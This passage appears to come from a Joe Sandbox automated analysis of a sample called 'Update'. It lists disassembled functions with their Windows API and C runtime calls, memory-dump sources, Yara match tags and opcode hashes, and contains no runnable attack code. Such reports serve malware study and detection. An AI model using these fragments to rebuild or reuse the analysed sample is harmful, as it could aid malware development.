• API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
• String ID:
• API String ID: 3421218197-0
APIs
  • Part of subcall function 034F1CD0: _doexit.LIBCMT ref: 034F1CDC
• ___set_flsgetvalue.LIBCMT ref: 034EF9CA
  • Part of subcall function 034F3CA0: TlsGetValue.KERNEL32(00000000,034F3DF9,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000), ref: 034F3CA9
  • Part of subcall function 034F3CA0: DecodePointer.KERNEL32(?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06,0000000D), ref: 034F3CBB
  • Part of subcall function 034F3CA0: TlsSetValue.KERNEL32(00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06), ref: 034F3CCA
• ___fls_getvalue@4.LIBCMT ref: 034EF9D5
  • Part of subcall function 034F3C80: TlsGetValue.KERNEL32(?,?,034EF9DA,00000000), ref: 034F3C8E
• ___fls_setvalue@8.LIBCMT ref: 034EF9E8
  • Part of subcall function 034F3CD4: DecodePointer.KERNEL32(?,?,?,034EF9ED,00000000,?,00000000), ref: 034F3CE5
• GetLastError.KERNEL32(00000000,?,00000000), ref: 034EF9F1
• ExitThread.KERNEL32 ref: 034EF9F8
• GetCurrentThreadId.KERNEL32 ref: 034EF9FE
• __freefls@4.LIBCMT ref: 034EFA1E
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 781180411-0
APIs
  • Part of subcall function 6C39A893: GetLastError.KERNEL32(?,?,6C395151,?,6C371A6D,00000000), ref: 6C39A897
  • Part of subcall function 6C39A893: SetLastError.KERNEL32(00000000,6C371A6D,00000000), ref: 6C39A939
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,6C39B1CB,?,?,?,00000055,?,-00000050,?,?,?), ref: 6C3A5931
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,6C39B1CB,?,?,?,00000055,?,-00000050,?,?), ref: 6C3A5968
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: PX;lE$utf8
• API String ID: 943130320-2026738284
APIs
  • Part of subcall function 6C38B2CF: __EH_prolog3.LIBCMT ref: 6C38B2D6
  • Part of subcall function 6C38B2CF: std::_Lockit::_Lockit.LIBCPMT ref: 6C38B2E1
  • Part of subcall function 6C38B2CF: std::locale::_Setgloballocale.LIBCPMT ref: 6C38B2FC
  • Part of subcall function 6C38B2CF: _Yarn.LIBCPMT ref: 6C38B312
  • Part of subcall function 6C38B2CF: std::_Lockit::~_Lockit.LIBCPMT ref: 6C38B34F
  • Part of subcall function 6C374CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6C374CD5
  • Part of subcall function 6C374CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6C374CEF
  • Part of subcall function 6C374CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6C374D10
  • Part of subcall function 6C374CA0: __Getctype.LIBCPMT ref: 6C374DC4
  • Part of subcall function 6C374CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6C374DF7
• std::ios_base::_Addstd.LIBCPMT ref: 6C37BE72
Strings
Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$AddstdGetctypeH_prolog3SetgloballocaleYarnstd::ios_base::_std::locale::_
                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                            • API String ID: 3375204848-1866435925
                                                                                            • Opcode ID: ca674ed2b67c7c0d23dd6f367021add164d2609787b2ae5a07d1ffb17e9d784f
                                                                                            • Instruction ID: dfd83fcc8d33156852a118e077a71a30c7d881cc5e5089390eddee675e18bd44
                                                                                            • Opcode Fuzzy Hash: ca674ed2b67c7c0d23dd6f367021add164d2609787b2ae5a07d1ffb17e9d784f
                                                                                            • Instruction Fuzzy Hash: 7851D3B4A017058FEB14CF64D8457AEBBB0FF44318F10422CE5166BB90D775A945CFA1
                                                                                            APIs
                                                                                              • Part of subcall function 6C38B51D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C38B529
                                                                                            • _strlen.LIBCMT ref: 6C372718
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlenstd::invalid_argument::invalid_argument
                                                                                            • String ID: Y.7l$ios_base::badbit set$string too long
                                                                                            • API String ID: 4097767454-2837425648
                                                                                            • Opcode ID: ec84cbbbc231eb1e8765ca1ca96bf0838211ab718026a720017e5603c12b62f3
                                                                                            • Instruction ID: 3cd1c72ff08345285e74ce00fad627c5f397ba9d3732c5ca8cbf15c9467c898e
                                                                                            • Opcode Fuzzy Hash: ec84cbbbc231eb1e8765ca1ca96bf0838211ab718026a720017e5603c12b62f3
                                                                                            • Instruction Fuzzy Hash: A141B7B2C01259DBCB10CF64DD84BDEBBB5EF48314F150225E844A7741E73A9A54CFA5
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E944A
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9482
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 1823113695-4289949731
                                                                                            • Opcode ID: e374b5363f9f9c598f25ddc83bc244d20eb3577ea3bb37fd7704f578ec8ebd0c
                                                                                            • Instruction ID: f399e20dd65e23c3f26e517db1759098466fa57d563263c9515b8ed0ab193a36
                                                                                            • Opcode Fuzzy Hash: e374b5363f9f9c598f25ddc83bc244d20eb3577ea3bb37fd7704f578ec8ebd0c
                                                                                            • Instruction Fuzzy Hash: DD21B6337043109FD721DE6CF88099AF799EB91666B240A6FE192CF3D0D766D840C7A9
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E84C9
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E84E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 963545896-4289949731
                                                                                            • Opcode ID: 3ccdb48b8e4fb6ad6bd396580803f952415e867c36e15fb6be9139163f638000
                                                                                            • Instruction ID: 302a30d45bf42a3541bb70d282f17101d85ab6c6a4844211ef10af22a26a0ce5
                                                                                            • Opcode Fuzzy Hash: 3ccdb48b8e4fb6ad6bd396580803f952415e867c36e15fb6be9139163f638000
                                                                                            • Instruction Fuzzy Hash: 52219D32700306AF8B14DF6CE980C69B3A9FF88616714466EE526CF751EB31E954CB98
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 00923A3A
                                                                                              • Part of subcall function 00923995: ___BuildCatchObjectHelper.LIBCMT ref: 009239CB
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00923A51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3487967840-3733052814
                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                            • Instruction ID: 0035318665668b5443196d8e9be81a98862319aaf3f0af187e823d4265d33d18
                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                            • Instruction Fuzzy Hash: A701463100012ABBDF12AF51ED45FEB7F6AEF48340F008020BD5815165D73ADAB1DBA1
                                                                                            APIs
                                                                                            • __current_exception.VCRUNTIME140 ref: 000217AF
                                                                                            • __current_exception_context.VCRUNTIME140 ref: 000217B9
                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000217C0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __current_exception__current_exception_contextterminate
                                                                                            • String ID: csm
                                                                                            • API String ID: 2542180945-1018135373
                                                                                            • Opcode ID: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
                                                                                            • Instruction ID: fee3ce6806449a47d22f27ac16de2c17e19a9547f2d977005fe60887edde41f1
                                                                                            • Opcode Fuzzy Hash: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
                                                                                            • Instruction Fuzzy Hash: 59F0A7364083304F8B355E29B4455DDB7FDAFB13613540455D484CBA11CB30ED51C6D1
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6C3A3F2D,?,?,00000000,?,?,?,6C3A3DEB,00000002,FlsGetValue,6C3B17C4,6C3B17CC), ref: 6C3A3E9E
                                                                                            • GetLastError.KERNEL32(?,6C3A3F2D,?,?,00000000,?,?,?,6C3A3DEB,00000002,FlsGetValue,6C3B17C4,6C3B17CC,?,?,6C3993D1), ref: 6C3A3EA8
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 6C3A3ED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3177248105-2084034818
                                                                                            • Opcode ID: 12d1a693c1042c2ee365416a994675b0ef47302cac77f9f46c95011dbd0eee5f
                                                                                            • Instruction ID: f03fd67b4c5f3dff88b0ff542ca83e45640ab4e1693a7f6a67866f34a501abbe
                                                                                            • Opcode Fuzzy Hash: 12d1a693c1042c2ee365416a994675b0ef47302cac77f9f46c95011dbd0eee5f
                                                                                            • Instruction Fuzzy Hash: 06E01A32384208B7EB011AA1DC06F593B69EB12B85F204520FA0CE98D1D762E5219E58
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(6C3BC354,G.7l,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AAE9
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6C3BC354,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AB1C
                                                                                            • WakeAllConditionVariable.KERNEL32(6C3BC350,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AB27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                            • String ID: G.7l
                                                                                            • API String ID: 1466638765-3243727157
                                                                                            • Opcode ID: 46b7db0f4b45f885507d79f5af15aad16af6d293885d172bd071340f98880172
                                                                                            • Instruction ID: ded969e927f97663ada3b24c908a34845665ba432a1f3ff0c0e3f8c2963cef3a
                                                                                            • Opcode Fuzzy Hash: 46b7db0f4b45f885507d79f5af15aad16af6d293885d172bd071340f98880172
                                                                                            • Instruction Fuzzy Hash: 15F03975601640DFDB15EF58E48895477BCFF6B314B04405AE9098B701DA746800CFA8
                                                                                            APIs
                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 034ED868
                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 034ED938
                                                                                            • SetLastError.KERNEL32(0000007F), ref: 034ED963
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Read$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2715074504-0
                                                                                            • Opcode ID: d0095261f17a44d99fac2c6b8577963e989a33041aab53d96ab10e53dae0d1d1
                                                                                            • Instruction ID: 0df81df4d1ef37067d67a02a42c1b2d7df0a31089ffcfed40ce41f7a209e1c8b
                                                                                            • Opcode Fuzzy Hash: d0095261f17a44d99fac2c6b8577963e989a33041aab53d96ab10e53dae0d1d1
                                                                                            • Instruction Fuzzy Hash: 4A419C71A0020AAFDB10CF99DC84B6AF3F9FF89315F1485AAD8599B351D771E901CB90
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32(F1BBC535,00000000,00000000,?), ref: 6C3A1629
                                                                                              • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C3A187B
                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C3A18C1
                                                                                            • GetLastError.KERNEL32 ref: 6C3A1964
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                            • String ID:
                                                                                            • API String ID: 2112829910-0
                                                                                            • Opcode ID: 1c4b8f62f15932de89a56e5b389de26271229736623c177e848835a1ba72b6a9
                                                                                            • Instruction ID: 0ab2897d00945fdd7a6fe5b612d830416a140d4491405f7e1a3c5c67b6565187
                                                                                            • Opcode Fuzzy Hash: 1c4b8f62f15932de89a56e5b389de26271229736623c177e848835a1ba72b6a9
                                                                                            • Instruction Fuzzy Hash: 91D16875E05248DFCB05CFE8C880AEDBBB9EF09314F28416AE465AB751D630E956CF60
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer
                                                                                            • String ID:
                                                                                            • API String ID: 1740715915-0
                                                                                            • Opcode ID: f9b20e78b7ed8508773fa9ea9de1f54ce289877a5935d906e89908187fd2e4bd
                                                                                            • Instruction ID: 32efb603152b7bcb97c9c07cd0dc84288a571290a060e234d19563645a72b041
                                                                                            • Opcode Fuzzy Hash: f9b20e78b7ed8508773fa9ea9de1f54ce289877a5935d906e89908187fd2e4bd
                                                                                            • Instruction Fuzzy Hash: 1C51F17260A706AFDB159F14D881BAAB3B8EF45318F20452DEC5A47A90F736E844CF90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                            • String ID:
                                                                                            • API String ID: 2478854527-0
                                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                            • Instruction ID: 63b42fc8810f6d0532c8d0b466c7838c54d345c4aca375200b1d567150fb9cf3
                                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                            • Instruction Fuzzy Hash: 9A318B39903720EFFB52EB758C98A57BFA5EB44AA0B14855AFD10CA2B1EB308051DF40
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0091E430
                                                                                            • __isleadbyte_l.LIBCMT ref: 0091E463
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0091701E,?,00000000,00000000,?,?,?,?,0091701E,00000000), ref: 0091E494
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0091701E,00000001,00000000,00000000,?,?,?,?,0091701E,00000000), ref: 0091E502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                                            • Instruction ID: dbaa9261d4a09db2a1897ea22880f2e6f2a75af267f55b82bf35033a458d1a87
                                                                                            • Opcode Fuzzy Hash: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                                            • Instruction Fuzzy Hash: FF318131B0025AEFDB21DFA4D880AF97BB9AF41311B1985A9F8658B1E1E730DDC0DB51
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 034FA5F6
                                                                                            • __isleadbyte_l.LIBCMT ref: 034FA629
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0350FBA0,?,03502564,00000000,?,?,?,?,0350FBA0,03502564), ref: 034FA65A
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0350FBA0,00000001,03502564,00000000,?,?,?,?,0350FBA0,03502564), ref: 034FA6C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 3ad4a8332e85ca2c217f9d501a3c8f9e49b218b032be37ac683bad236df0bab1
                                                                                            • Instruction ID: aaf3f50b831c009d65941e923093f57092f63452fdf0cf452dd4a3f770357e51
                                                                                            • Opcode Fuzzy Hash: 3ad4a8332e85ca2c217f9d501a3c8f9e49b218b032be37ac683bad236df0bab1
                                                                                            • Instruction Fuzzy Hash: 3731E371A00245EFEB20DF64C8949BE7BB5BF01211F1D85AAE6A98F2A0D331D940CF58
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374EA5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374EC2
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374EE3
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374F79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: b8d933a7ad7baa784c289e80fabcb0062808f41bbce00221bac8a28dbb6239e6
                                                                                            • Instruction ID: ccea9ad2205210507d60f197fc22ca3ff096f748f06fd6618465fee41d6c0b59
                                                                                            • Opcode Fuzzy Hash: b8d933a7ad7baa784c289e80fabcb0062808f41bbce00221bac8a28dbb6239e6
                                                                                            • Instruction Fuzzy Hash: 6E415871D002188FCB25DF94D884BEEB7B4FB48328F044229E814AB790E739A944CFA5
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C372EE5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C372EFF
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C372F20
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C372FF5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 8f54e743420ae132e96afa3555a8e3b6b74dd066964c85e52a617e4540bb2a02
                                                                                            • Instruction ID: 9ffd4b660fdc7ef5ce5f046780a4925f1feb7ffcb7bd1fe2c845f9bb4ed254b0
                                                                                            • Opcode Fuzzy Hash: 8f54e743420ae132e96afa3555a8e3b6b74dd066964c85e52a617e4540bb2a02
                                                                                            • Instruction Fuzzy Hash: 44415971E01614CFCB20DF94C944BDEB7B4FB58718F048219D895AB790D73AA904CFA5
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37CBA5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37CBBF
